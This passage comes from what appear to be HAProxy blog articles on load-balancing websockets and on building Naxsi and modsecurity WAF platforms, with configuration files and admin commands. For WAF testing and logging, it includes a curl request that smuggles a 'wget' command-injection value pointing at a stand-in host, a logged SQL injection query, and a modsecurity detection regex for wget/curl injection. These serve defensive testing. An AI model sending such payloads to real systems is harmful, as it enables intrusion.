From now on, the TCP connection used for the HTTP request/response exchange is used for the websocket: whenever a peer wants to interact with the other peer, it can use it.

The websocket ends as soon as one peer decides to close it or when the TCP connection is closed.

HAProxy and Websockets


As seen above, there are 2 protocols embedded in websockets:

  1. HTTP: for the websocket setup
  2. TCP: websocket data exchange

HAProxy must be able to support websockets on these two protocols without ever breaking the TCP connection.
There are 2 things to take care of:

  1. being able to switch a connection from HTTP to TCP without breaking it
  2. smartly manage timeouts for both protocols at the same time

Fortunately, HAProxy embeds all you need to load-balance websockets properly and can meet the 2 requirements above.
It can even route regular HTTP traffic and websocket traffic to different backends and perform websocket-aware health checks (on the setup phase only).

The diagram below shows how things happen and the HAProxy timeouts involved in each phase:
[Diagram: websocket setup and data phases with the corresponding HAProxy timeouts]

During the setup phase, HAProxy can work in HTTP mode, processing layer 7 information. It automatically detects the Connection: Upgrade exchange and is ready to switch to tunnel mode if the upgrade negotiation succeeds. During this phase, there are 3 timeouts involved:

  1. timeout client: client inactivity
  2. timeout connect: allowed TCP connection establishment time
  3. timeout server: allowed time for the server to process the request

If everything goes well, the websocket is established, and HAProxy then switches to tunnel mode: no data is analyzed anymore (and anyway, websocket does not speak HTTP). A single timeout is involved:

  1. timeout tunnel: takes precedence over the client and server timeouts

timeout connect is not used since the TCP connection is already established 🙂

Testing websocket with node.js

node.js is a platform which can host applications. It has a websocket module we'll use in the test below.

Here is the procedure to install node.js and the websocket module on Debian Squeeze.
The example code comes from https://github.com/Worlize/WebSocket-Node (at the bottom of the page).
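
For the record, once node.js and npm are available on the box, the websocket module used by the example code can be fetched with:

npm install websocket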

So basically, I'll have 2 servers, each one hosting web pages on Apache and a websocket echo application hosted by node.js. High-availability and routing are managed by HAProxy.

Configuration


Simple configuration


In this configuration, the websocket and the web server are on the same application.
HAProxy switches automatically from HTTP to tunnel mode when the client requests a websocket.

defaults
  mode http
  log global
  option httplog
  option  http-server-close
  option  dontlognull
  option  redispatch
  option  contstats
  retries 3
  backlog 10000
  timeout client          25s
  timeout connect          5s
  timeout server          25s
# timeout tunnel available in ALOHA 5.5 or HAProxy 1.5-dev10 and higher
  timeout tunnel        3600s
  timeout http-keep-alive  1s
  timeout http-request    15s
  timeout queue           30s
  timeout tarpit          60s
  default-server inter 3s rise 2 fall 3
  option forwardfor

frontend ft_web
  bind 192.168.10.3:80 name http
  maxconn 10000
  default_backend bk_web

backend bk_web                      
  balance roundrobin
  server websrv1 192.168.10.11:8080 maxconn 10000 weight 10 cookie websrv1 check
  server websrv2 192.168.10.12:8080 maxconn 10000 weight 10 cookie websrv2 check
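
The protocol switch can be checked from a shell by sending a handshake through the frontend. A sketch (the Sec-WebSocket-Key below is a dummy value, like the one used by the health check later in this article; some servers insist on a real base64-encoded 16-byte key):

curl -i -N -H "Connection: Upgrade" -H "Upgrade: websocket" -H "Sec-WebSocket-Key: haproxy" -H "Sec-WebSocket-Version: 13" -H "Sec-WebSocket-Protocol: echo-protocol" http://192.168.10.3/

If everything is in place, the first response line is "HTTP/1.1 101 Switching Protocols" and HAProxy switches the connection to tunnel mode.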

Advanced Configuration


The configuration below allows routing requests based on either the Host header (if you have a dedicated host for your websocket calls) or the Connection and Upgrade headers (required to switch to websocket).
In the backend dedicated to websockets, HAProxy validates the setup phase and also ensures the user is requesting a valid application name.
HAProxy also performs a websocket health check, sending a Connection upgrade request and expecting a 101 response status code. We can't go further on the health check for now.
Optional: the web server is hosted on Apache, but could be hosted by node.js as well.

defaults
  mode http
  log global
  option httplog
  option  http-server-close
  option  dontlognull
  option  redispatch
  option  contstats
  retries 3
  backlog 10000
  timeout client          25s
  timeout connect          5s
  timeout server          25s
# timeout tunnel available in ALOHA 5.5 or HAProxy 1.5-dev10 and higher
  timeout tunnel        3600s
  timeout http-keep-alive  1s
  timeout http-request    15s
  timeout queue           30s
  timeout tarpit          60s
  default-server inter 3s rise 2 fall 3
  option forwardfor



frontend ft_web
  bind 192.168.10.3:80 name http
  maxconn 60000

## routing based on Host header
  acl host_ws hdr_beg(Host) -i ws.
  use_backend bk_ws if host_ws

## routing based on websocket protocol header
  acl hdr_connection_upgrade hdr(Connection)  -i upgrade
  acl hdr_upgrade_websocket  hdr(Upgrade)     -i websocket

  use_backend bk_ws if hdr_connection_upgrade hdr_upgrade_websocket
  default_backend bk_web



backend bk_web                                                   
  balance roundrobin                                             
  option httpchk HEAD /                                          
  server websrv1 192.168.10.11:80 maxconn 100 weight 10 cookie websrv1 check
  server websrv2 192.168.10.12:80 maxconn 100 weight 10 cookie websrv2 check



backend bk_ws                                                    
  balance roundrobin

## websocket protocol validation
  acl hdr_connection_upgrade hdr(Connection)                 -i upgrade
  acl hdr_upgrade_websocket  hdr(Upgrade)                    -i websocket
  acl hdr_websocket_key      hdr_cnt(Sec-WebSocket-Key)      eq 1
  acl hdr_websocket_version  hdr_cnt(Sec-WebSocket-Version)  eq 1
  http-request deny if ! hdr_connection_upgrade ! hdr_upgrade_websocket ! hdr_websocket_key ! hdr_websocket_version

## ensure our application protocol name is valid 
## (don't forget to update the list each time you publish new applications)
  acl ws_valid_protocol hdr(Sec-WebSocket-Protocol) echo-protocol
  http-request deny if ! ws_valid_protocol

## websocket health checking
  option httpchk GET / HTTP/1.1\r\nHost:\ ws.domain.com\r\nConnection:\ Upgrade\r\nUpgrade:\ websocket\r\nSec-WebSocket-Key:\ haproxy\r\nSec-WebSocket-Version:\ 13\r\nSec-WebSocket-Protocol:\ echo-protocol
  http-check expect status 101

  server websrv1 192.168.10.11:8080 maxconn 30000 weight 10 cookie websrv1 check
  server websrv2 192.168.10.12:8080 maxconn 30000 weight 10 cookie websrv2 check

Note that HAProxy could also be used to route to different websocket applications based on the Sec-WebSocket-Protocol header of the setup phase (I may write an article about that later).


high performance WAF platform with Naxsi and HAProxy

Synopsis

I've already described WAFs in a previous article, where I spoke about WAF scalability with Apache and modsecurity.
One of the main issues with Apache and modsecurity is performance. To address it, an alternative exists: Naxsi, a Web Application Firewall module for nginx.

So, using Naxsi and HAProxy as a load-balancer, we're able to build a platform which meets the following requirements:

  • Web Application Firewall: achieved by nginx and Naxsi
  • High-availability: application server and WAF monitoring, achieved by HAProxy
  • Scalability: ability to adapt capacity to the upcoming volume of traffic, achieved by HAProxy
  • DDOS protection: blind and brutal attacks protection, slowloris protection, achieved by HAProxy
  • Content-Switching: ability to route only dynamic requests to the WAF, achieved by HAProxy
  • Reliability: ability to detect capacity overusage, achieved by HAProxy
  • Performance: deliver response as fast as possible, achieved by the whole platform

The picture below provides a better overview:
[Diagram: WAF platform overview]

The LAB platform is composed of 6 boxes:

  • 2 ALOHA Load-Balancers (could be replaced by HAProxy 1.5-dev)
  • 2 WAF servers: CentOS 6.0, nginx and Naxsi
  • 2 Web servers: Debian + apache + PHP + dokuwiki

Nginx and Naxsi installation on CentOS 6

The purpose of this article is not to provide such a procedure, so please read this wiki article, which summarizes how to install nginx and Naxsi on CentOS 6.0.

Diagram

The diagram below shows the platform with HAProxy frontends (prefixed by ft_) and backends (prefixed by bk_). Each farm is composed of 2 servers.

Configuration

Nginx and Naxsi


Configure nginx as a reverse-proxy which listens on the address declared in bk_waf and forwards traffic to ft_web. In the meantime, Naxsi is there to analyze the requests.

server {
 proxy_set_header Proxy-Connection "";
 listen       192.168.10.15:81;
 access_log  /var/log/nginx/naxsi_access.log;
 error_log  /var/log/nginx/naxsi_error.log debug;

 location / {
  include    /etc/nginx/test.rules;
  proxy_pass http://192.168.10.2:81/;
 }

 error_page 403 /403.html;
 location = /403.html {
  root /opt/nginx/html;
  internal;
 }

 location /RequestDenied {
  return 403;
 }
}

HAProxy Load-Balancer configuration


The configuration below enables the following advanced features:

  • DDOS protection on the frontend
  • abuser or attacker detection in bk_waf and blocking on the public interface (ft_waf)
  • bypassing the WAF in case of overusage or unavailability

######## Default values for all entries till next defaults section
defaults
  option  http-server-close
  option  dontlognull
  option  redispatch
  option  contstats
  retries 3
  timeout connect 5s
  timeout http-keep-alive 1s
  # Slowloris protection
  timeout http-request 15s
  timeout queue 30s
  timeout tarpit 1m          # tarpit hold time
  backlog 10000

# public frontend where users get connected to
frontend ft_waf
  bind 192.168.10.2:80 name http
  mode http
  log global
  option httplog
  timeout client 25s
  maxconn 10000

  # DDOS protection
  # Use General Purpose Counter (gpc) 0 in SC1 as a global abuse counter
  # Monitor the number of requests sent by an IP over a period of 10 seconds
  stick-table type ip size 1m expire 1m store gpc0,http_req_rate(10s),http_err_rate(10s)
  tcp-request connection track-sc1 src
  tcp-request connection reject if { sc1_get_gpc0 gt 0 }
  # Abuser means more than 100 reqs/10s
  acl abuse sc1_http_req_rate(ft_waf) ge 100
  acl flag_abuser sc1_inc_gpc0(ft_waf)
  tcp-request content reject if abuse flag_abuser

  acl static path_beg /static/ /dokuwiki/images/
  acl no_waf nbsrv(bk_waf) eq 0
  acl waf_max_capacity queue(bk_waf) ge 1
  # bypass WAF farm if no WAF available
  use_backend bk_web if no_waf
  # bypass WAF farm if it reaches its capacity
  use_backend bk_web if static waf_max_capacity
  default_backend bk_waf

# WAF farm where users' traffic is routed first
backend bk_waf
  balance roundrobin
  mode http
  log global
  option httplog
  option forwardfor header X-Client-IP
  option httpchk HEAD /waf_health_check HTTP/1.0

  # If the source IP generated 10 or more http errors over the defined period,
  # flag the IP as abuser on the frontend
  acl abuse sc1_http_err_rate(ft_waf) ge 10
  acl flag_abuser sc1_inc_gpc0(ft_waf)
  tcp-request content reject if abuse flag_abuser

  # Specific WAF checking: a DENY means everything is OK
  http-check expect status 403
  timeout server 25s
  default-server inter 3s rise 2 fall 3
  server waf1 192.168.10.15:81 maxconn 100 weight 10 check
  server waf2 192.168.10.16:81 maxconn 100 weight 10 check

# Traffic secured by the WAF arrives here
frontend ft_web
  bind 192.168.10.2:81 name http
  mode http
  log global
  option httplog
  timeout client 25s
  maxconn 1000
  # route health check requests to a specific backend to avoid graph pollution in ALOHA GUI
  use_backend bk_waf_health_check if { path /waf_health_check }
  default_backend bk_web

# application server farm
backend bk_web
  balance roundrobin
  mode http
  log global
  option httplog
  option forwardfor
  cookie SERVERID insert indirect nocache
  default-server inter 3s rise 2 fall 3
  option httpchk HEAD /
  # get connected on the application server using the user ip
  # provided in the X-Client-IP header setup by ft_waf frontend
  source 0.0.0.0 usesrc hdr_ip(X-Client-IP)
  timeout server 25s
  server server1 192.168.10.11:80 maxconn 100 weight 10 cookie server1 check
  server server2 192.168.10.12:80 maxconn 100 weight 10 cookie server2 check

# backend dedicated to WAF checking (to avoid graph pollution)
backend bk_waf_health_check
  balance roundrobin
  mode http
  log global
  option httplog
  option forwardfor
  default-server inter 3s rise 2 fall 3
  timeout server 25s
  server server1 192.168.10.11:80 maxconn 100 weight 10 check
  server server2 192.168.10.12:80 maxconn 100 weight 10 check

Detecting attacks


On the load-balancer


The ft_waf frontend stick-table tracks two pieces of information: http_req_rate and http_err_rate, which are respectively the HTTP request rate and the HTTP error rate generated by a single IP address.
HAProxy automatically blocks an IP which has generated more than 100 requests over a period of 10s, or 10 errors (WAF 403 responses included) in 10s. The user is then blocked for 1 minute, and stays blocked as long as he keeps on abusing.
Of course, you can tune the values above to whatever you need: it is fully flexible.

To check the status of the IPs on your load-balancer, just run the command below:

echo show table ft_waf | socat /var/run/haproxy.stat - 
# table: ft_waf, type: ip, size:1048576, used:1
0xc33304: key=192.168.10.254 use=0 exp=4555 gpc0=0 http_req_rate(10000)=1 http_err_rate(10000)=1
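
If a legitimate user ends up blacklisted (gpc0 above 0), the entry can be flushed by hand through the stats socket (a sketch relying on the clear table directive of recent HAProxy 1.5-dev versions; the IP is the one from the output above):

echo clear table ft_waf key 192.168.10.254 | socat /var/run/haproxy.stat -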

Note: the ALOHA Load-balancer does not provide the watch tool, but you can monitor the content of the table live with the command below:

while true ; do echo show table ft_waf | socat /var/run/haproxy.stat - ; sleep 2 ; clear ; done

On the WAF


Every Naxsi error appears in /var/log/nginx/naxsi_error.log, e.g.:

2012/10/16 13:40:13 [error] 10556#0: *10293 NAXSI_FMT: ip=192.168.10.254&server=192.168.10.15&uri=/testphp.vulnweb.com/artists.php&total_processed=3195&total_blocked=2&zone0=ARGS&id0=1000&var_name0=artist, client: 192.168.10.254, server: , request: "GET /testphp.vulnweb.com/artists.php?artist=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user HTTP/1.1", host: "192.168.10.15:81"

The Naxsi log line is less obvious than the modsecurity one. The rule(s) which matched are provided by the idX=... arguments.
I got no false positive during the test; I actually had to craft a request on purpose to make Naxsi match one 🙂.

Conclusion


Today, we saw it's easy to build a scalable, well-performing WAF platform in front of any web application.
The WAF is able to tell HAProxy which IPs to automatically blacklist (through error rate monitoring), which is convenient since the attacker won't bother the WAF for a certain amount of time 😉
The platform detects WAF farm availability and bypasses it in case of total failure; we even saw it is possible to bypass the WAF for static content if the farm runs out of capacity. The purpose is to deliver a good end-user experience without giving up too much security.
Note that it is also possible to route all the static content directly to the web servers (or a static farm), whatever the status of the WAF farm.
This makes me say the platform is fully scalable and flexible.
Thanks to HAProxy, the architecture is very flexible: I could switch my Apache + modsecurity setup to nginx + Naxsi with no issue at all 🙂 The same could be done with any third-party WAF appliance.
Note that I did not try any of Naxsi's advanced features, like the learning mode or the UI.


Scalable WAF protection with HAProxy and Apache with modsecurity

Greetings to Thomas Heil, from our German partner Olanis, for his help with the Apache and modsecurity configuration.

What is a Web Application Firewall (WAF)?

Years ago, it was common to protect networks using a firewall… well-known devices which filter traffic at layers 3 and 4…
Nowadays, the weaknesses have moved from the network stack to the application layer, making the old firewall useless and obsolete (for protection purposes, I mean). We then used to deploy IDS or IPS, which try to match attacks at packet level. These products are usually very hard to tune.
Then the Web Application Firewall arrived: it's a firewall aware of the layer 7 protocol, hence more efficient when deciding to block requests (or responses).
This is because attacks have become more sophisticated, like SQL injection, cross-site scripting, etc…

One of the most famous opensource WAFs is mod_security, which has worked for a long time as a module for the Apache webserver and IIS, and has recently been announced for nginx too.
A very good alternative is Naxsi, a module for nginx, still young but very promising.

In today's article, I'll focus on modsecurity for Apache. In a later article, I'll build the same platform with Naxsi and nginx.

Scalable WAF platform


The main problem with WAFs is that they require a lot of resources to analyze each request's headers and body (they can even be configured to analyze responses). If you want to be able to protect all your incoming traffic, then you must think about scalability.
In the present article, I'm going to explain how to build a reliable and scalable platform where WAF capacity won't be an issue. I could add “and where WAF maintenance can be done during business hours”.
Here are the basic purposes to achieve:

  • Web Application Firewall: achieved by Apache and modsecurity
  • High-availability: application server and WAF monitoring, achieved by HAProxy
  • Scalability: ability to adapt capacity to the upcoming volume of traffic, achieved by HAProxy

It would be good if the platform could also achieve the following advanced features:

  • DDOS protection: blind and brutal attacks protection, slowloris protection, achieved by HAProxy
  • Content-Switching: ability to route only dynamic requests to the WAF, achieved by HAProxy
  • Reliability: ability to detect capacity overusage, achieved by HAProxy
  • Performance: deliver response as fast as possible, achieved by the whole platform

Web platform with WAF Diagram

The diagram below shows the platform with HAProxy frontends (prefixed by ft_) and backends (prefixed by bk_). Each farm is composed of 2 servers.

As you can see, at first sight, all the traffic seems to go to the WAFs, then come back through HAProxy before being routed to the web servers. This is the basic configuration, meeting the basic requirements: Web Application Firewall, High-Availability, Scalability.

Platform installation


As the load-balancer, I'm going to use our well-known ALOHA 🙂
The web servers are standard Debian boxes with Apache and PHP; the application on top of them is dokuwiki. I have no procedure for this one, it is very straightforward!
The WAFs run on CentOS 6.3 x86_64, using modsecurity 2.5.8. The installation procedure is outside the scope of this article, so I documented it on my personal wiki.
All these servers are virtualized on my laptop using KVM, so NO, I won't run performance benchmarks, it would be ridiculous!

Configuration

WAF configuration


Basic configuration here, no tuning at all. The purpose is not to explain how to configure a WAF, sorry.

Apache Configuration


Modifications to the file /etc/httpd/conf/httpd.conf:

Listen 192.168.10.15:81
[...]
LoadModule security2_module modules/mod_security2.so
LoadModule unique_id_module modules/mod_unique_id.so
[...]
NameVirtualHost 192.168.10.15:81
[...]
<IfModule mod_security2.c>
        SecPcreMatchLimit 1000000
        SecPcreMatchLimitRecursion 1000000
        SecDataDir logs/
</IfModule>
<VirtualHost 192.168.10.15:81>
        ServerName *
        AddDefaultCharset UTF-8

        <IfModule mod_security2.c>
                Include modsecurity.d/modsecurity_crs_10_setup.conf
                Include modsecurity.d/aloha.conf
                Include modsecurity.d/rules/*.conf

                SecRuleEngine On
                SecRequestBodyAccess On
                SecResponseBodyAccess On
        </IfModule>

        ProxyPreserveHost On
        ProxyRequests off
        ProxyVia Off
        ProxyPass / http://192.168.10.2:81/
        ProxyPassReverse / http://192.168.10.2:81/
</VirtualHost>

Basically, we just turned Apache into a reverse-proxy, accepting traffic for any server name and applying modsecurity rules before routing traffic back to the HAProxy frontend dedicated to the web servers.
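A quick way to check a WAF node behaves as expected is to send it a benign request and an obviously malicious one; which rule fires depends on your CRS version, so the second URL is only an example:

# a normal page must be proxied to the web farm and answered normally
curl -i http://192.168.10.15:81/dokuwiki/
# a request matching a CRS pattern (command injection here) must be denied
curl -i "http://192.168.10.15:81/index.php?cmd=;wget+http://evil.example/"
# expected: HTTP/1.1 403 Forbidden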

Client IP


HAProxy works as a reverse proxy and so uses its own IP address to connect to the WAF servers. You therefore have to install mod_rpaf so the WAF sees the real client IP, for both tracking and logging.
To install mod_rpaf, follow these instructions: apache mod_rpaf installation.
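For the impatient, here is a minimal build sketch on CentOS; the download URL and version are assumptions, check the instructions linked above:

# build dependencies
yum install -y httpd-devel gcc wget
# fetch and compile the module with apxs (version 0.6 assumed)
wget http://stderr.net/apache/rpaf/download/mod_rpaf-0.6.tar.gz
tar xzf mod_rpaf-0.6.tar.gz && cd mod_rpaf-0.6
apxs -i -c -n mod_rpaf-2.0.so mod_rpaf-2.0.c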
Concerning its configuration, we’ll do it as below; edit the file /etc/httpd/conf.d/mod_rpaf.conf:

LoadModule rpaf_module modules/mod_rpaf-2.0.so

<IfModule rpaf_module>
        RPAFenable On
        RPAFproxy_ips 192.168.10.1 192.168.10.3
        RPAFheader X-Client-IP
</IfModule>
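To verify the setup, send a request carrying the header directly to a WAF node and check Apache’s access log. Note that mod_rpaf only trusts the addresses listed in RPAFproxy_ips, so the test must be run from one of them; the spoofed address below is just an example:

# run from 192.168.10.1 or 192.168.10.3 (the trusted proxies)
curl -H "X-Client-IP: 203.0.113.42" http://192.168.10.15:81/
# the last access log entry should show 203.0.113.42 as the client
tail -n 1 /var/log/httpd/access_log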

modsecurity custom rules

In the Apache configuration there is a directive which tells modsecurity to load a file called aloha.conf. The purpose of this file is to make modsecurity deny the health check requests coming from HAProxy without logging them.
HAProxy will consider a WAF operational only if it gets a 403 response to this request (see the HAProxy configuration below).
Content of the file /etc/httpd/modsecurity.d/aloha.conf:

SecRule REQUEST_FILENAME "/waf_health_check" "nolog,deny"
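You can check the rule by hand; the WAF must deny the health check URL, which is exactly what HAProxy will expect:

curl -i http://192.168.10.15:81/waf_health_check
# expected: HTTP/1.1 403 Forbidden (a 200 here would mean the rule is not loaded)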

Load-Balancer (HAProxy) configuration for basic usage


The configuration below is the first pass we make when deploying such a platform; it is basic, simple and straightforward:

######## Default values for all entries till next defaults section
defaults
  option  http-server-close
  option  dontlognull
  option  redispatch
  option  contstats
  retries 3
  timeout connect 5s
  timeout http-keep-alive 1s
  # Slowloris protection
  timeout http-request 15s
  timeout queue 30s
  timeout tarpit 1m          # tarpit hold time
  backlog 10000

# public frontend where users get connected to
frontend ft_waf
  bind 192.168.10.2:80 name http
  mode http
  log global
  option httplog
  timeout client 25s
  maxconn 1000
  default_backend bk_waf

# WAF farm where users' traffic is routed first
backend bk_waf
  balance roundrobin
  mode http
  log global
  option httplog
  option forwardfor header X-Client-IP
  option httpchk HEAD /waf_health_check HTTP/1.0
  # Specific WAF checking: a DENY means everything is OK
  http-check expect status 403
  timeout server 25s
  default-server inter 3s rise 2 fall 3
  server waf1 192.168.10.15:81 maxconn 100 weight 10 check
  server waf2 192.168.10.16:81 maxconn 100 weight 10 check

# Traffic secured by the WAF arrives here
frontend ft_web
  bind 192.168.10.2:81 name http
  mode http
  log global
  option httplog
  timeout client 25s
  maxconn 1000
  # route health check requests to a specific backend to avoid graph pollution in ALOHA GUI
  use_backend bk_waf_health_check if { path /waf_health_check }
  default_backend bk_web

# application server farm
backend bk_web
  balance roundrobin
  mode http
  log global
  option httplog
  option forwardfor
  cookie SERVERID insert indirect nocache
  default-server inter 3s rise 2 fall 3
  option httpchk HEAD /
  timeout server 25s
  server server1 192.168.10.11:80 maxconn 100 weight 10 cookie server1 check
  server server2 192.168.10.12:80 maxconn 100 weight 10 cookie server2 check

# backend dedicated to WAF checking (to avoid graph pollution)
backend bk_waf_health_check
  balance roundrobin
  mode http
  log global
  option httplog
  option forwardfor
  default-server inter 3s rise 2 fall 3
  timeout server 25s
  server server1 192.168.10.11:80 maxconn 100 weight 10 check
  server server2 192.168.10.12:80 maxconn 100 weight 10 check
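Before going further, it is worth validating the configuration and sending one request through the whole chain; the paths below are assumptions, adapt them to your setup:

# syntax check of the configuration file
haproxy -c -f /etc/haproxy/haproxy.cfg
# one request should now flow: client -> ft_waf -> bk_waf (WAF) -> ft_web -> bk_web
curl -i http://192.168.10.2:80/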

Advanced Load-Balancing (HAProxy) configuration


We’re now going to improve the platform a bit. The picture below shows which type of protection is achieved by the load-balancer and which by the WAF:

The configuration below adds a few more features:

  • DDOS protection on the frontend
  • abuser or attacker detection in bk_waf and blocking on the public interface (ft_waf)
  • Bypassing the WAF farm when it is overloaded or unavailable

This will allow the platform to meet the advanced requirements: DDOS protection, Content-Switching, Reliability and Performance.

######## Default values for all entries till next defaults section
defaults
  option  http-server-close
  option  dontlognull
  option  redispatch
  option  contstats
  retries 3
  timeout connect 5s
  timeout http-keep-alive 1s
  # Slowloris protection
  timeout http-request 15s
  timeout queue 30s
  timeout tarpit 1m          # tarpit hold time
  backlog 10000

# public frontend where users get connected to
frontend ft_waf
  bind 192.168.10.2:80 name http
  mode http
  log global
  option httplog
  timeout client 25s
  maxconn 10000

  # DDOS protection
  # Use General Purpose Counter (gpc) 0 in SC1 as a global abuse counter
  # Monitor the number of requests sent by an IP over a period of 10 seconds
  stick-table type ip size 1m expire 1m store gpc0,http_req_rate(10s),http_err_rate(10s)
  tcp-request connection track-sc1 src
  tcp-request connection reject if { sc1_get_gpc0 gt 0 }
  # An abuser means more than 100 reqs/10s
  acl abuse sc1_http_req_rate(ft_waf) ge 100
  acl flag_abuser sc1_inc_gpc0(ft_waf)
  tcp-request content reject if abuse flag_abuser

  acl static path_beg /static/ /dokuwiki/images/
  acl no_waf nbsrv(bk_waf) eq 0
  acl waf_max_capacity queue(bk_waf) ge 1
  # bypass WAF farm if no WAF available
  use_backend bk_web if no_waf
  # bypass WAF farm if it reaches its capacity
  use_backend bk_web if static waf_max_capacity
  default_backend bk_waf

# WAF farm where users' traffic is routed first
backend bk_waf
  balance roundrobin
  mode http
  log global
  option httplog
  option forwardfor header X-Client-IP
  option httpchk HEAD /waf_health_check HTTP/1.0

  # If the source IP generated 10 or more http errors over the defined period,
  # flag the IP as an abuser on the frontend
  acl abuse sc1_http_err_rate(ft_waf) ge 10
  acl flag_abuser sc1_inc_gpc0(ft_waf)
  tcp-request content reject if abuse flag_abuser

  # Specific WAF checking: a DENY means everything is OK
  http-check expect status 403
  timeout server 25s
  default-server inter 3s rise 2 fall 3
  server waf1 192.168.10.15:81 maxconn 100 weight 10 check
  server waf2 192.168.10.16:81 maxconn 100 weight 10 check

# Traffic secured by the WAF arrives here
frontend ft_web
  bind 192.168.10.2:81 name http
  mode http
  log global
  option httplog
  timeout client 25s
  maxconn 1000
  # route health check requests to a specific backend to avoid graph pollution in ALOHA GUI
  use_backend bk_waf_health_check if { path /waf_health_check }
  default_backend bk_web

# application server farm
backend bk_web
  balance roundrobin
  mode http
  log global
  option httplog
  option forwardfor
  cookie SERVERID insert indirect nocache
  default-server inter 3s rise 2 fall 3
  option httpchk HEAD /
  # connect to the application server using the client IP provided
  # in the X-Client-IP header set by the bk_waf backend
  source 0.0.0.0 usesrc hdr_ip(X-Client-IP)
  timeout server 25s
  server server1 192.168.10.11:80 maxconn 100 weight 10 cookie server1 check
  server server2 192.168.10.12:80 maxconn 100 weight 10 cookie server2 check

# backend dedicated to WAF checking (to avoid graph pollution)
backend bk_waf_health_check
  balance roundrobin
  mode http
  log global
  option httplog
  option forwardfor
  default-server inter 3s rise 2 fall 3
  timeout server 25s
  server server1 192.168.10.11:80 maxconn 100 weight 10 check
  server server2 192.168.10.12:80 maxconn 100 weight 10 check
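A simple way to exercise the bypass logic is to take the whole WAF farm down and check the site still answers: after the checks fail (fall 3 with inter 3s, so roughly 9 seconds), nbsrv(bk_waf) drops to 0 and ft_waf routes straight to bk_web.

# on waf1 and waf2: stop Apache so HAProxy flags them down
service httpd stop
# back on a client, about 10 seconds later the site must still answer
curl -i http://192.168.10.2:80/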

Detecting attacks


On the load-balancer


The ft_waf frontend’s stick table tracks two pieces of information: http_req_rate and http_err_rate, respectively the HTTP request rate and the HTTP error rate generated by a single IP address.
HAProxy automatically blocks an IP which has generated more than 100 requests over a period of 10s, or 10 errors (WAF 403 responses included) in 10s. The IP stays blocked for 1 minute, and the block is renewed as long as it keeps on abusing.
Of course, you can adjust the above values to whatever you need: it is fully flexible.
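A crude way to see the protection in action is to simulate an abuser from a test machine, using the addresses and thresholds configured above:

# send well over 100 requests in under 10 seconds from a single IP
for i in $(seq 1 150); do curl -s -o /dev/null http://192.168.10.2:80/ ; done
# once flagged, further connections are rejected at the TCP level for ~1 minute
curl -i http://192.168.10.2:80/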

To know the status of IPs in your load-balancer, just run the command below:

echo show table ft_waf | socat /var/run/haproxy.stat - 
# table: ft_waf, type: ip, size:1048576, used:1
0xc33304: key=192.168.10.254 use=0 exp=4555 gpc0=0 http_req_rate(10000)=1 http_err_rate(10000)=1

Note: The ALOHA Load-balancer does not provide watch, but you can monitor the content of the table live with the command below:

while true ; do echo show table ft_waf | socat /var/run/haproxy.stat - ; sleep 2 ; clear ; done
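And should you need to un-block an IP before its entry expires, you can remove it from the table by hand:

echo "clear table ft_waf key 192.168.10.254" | socat /var/run/haproxy.stat -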

On the WAF


I have not set up anything particular for WAF logging, so all errors appear in /var/log/httpd/error_log, e.g.:

[Fri Oct 12 10:48:21 2012] [error] [client 192.168.10.254] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:(?:[\\;\\|\\`]\\W*?\\bcc|\\b(wget|curl))\\b|\\/cc(?:[\\'\"\\|\\;\\`\\-\\s]|$))" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2.2.5"] [msg "System Command Injection"] [data "/cc-"] [severity "CRITICAL"] [tag "WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mywiki"] [uri "/dokuwiki/lib/images/license/button/cc-by-sa.png"] [unique_id "UHfZVcCoCg8AAApVAzsAAAAA"]

Seems to be a false positive 🙂
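One way of dealing with such a false positive is to disable the offending rule with SecRuleRemoveById. Since this directive only removes rules that are already defined, the file must be loaded after the CRS rules; the sketch below relies on Apache’s wildcard Include processing files alphabetically, which is an assumption worth double-checking on your setup:

# whitelist file named so that the "Include modsecurity.d/rules/*.conf"
# wildcard loads it last, i.e. after the rule it removes
cat > /etc/httpd/modsecurity.d/rules/zz_whitelist.conf <<'EOF'
# rule 950907 wrongly matched dokuwiki's cc-by-sa.png image
SecRuleRemoveById 950907
EOF
service httpd restart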

Conclusion


Today, we saw it’s easy to build a scalable and well performing WAF platform in front of our web application.
The WAF is able to tell HAProxy which IPs to automatically blacklist (through error rate monitoring), which is convenient since an attacker won’t bother the WAF for a certain amount of time 😉
The platform can detect WAF farm availability and bypass it in case of total failure; we even saw it is possible to bypass the WAF for static content if the farm is running out of capacity. The purpose is to deliver a good end-user experience without weakening security too much.
Note that it is possible to route all the static content directly to the web servers (or a static farm), whatever the status of the WAF farm.
This makes the platform fully scalable and flexible.
Also, remember to monitor your WAF logs: as shown in the example above, a false positive was preventing an image from being loaded from dokuwiki.

Related links

Links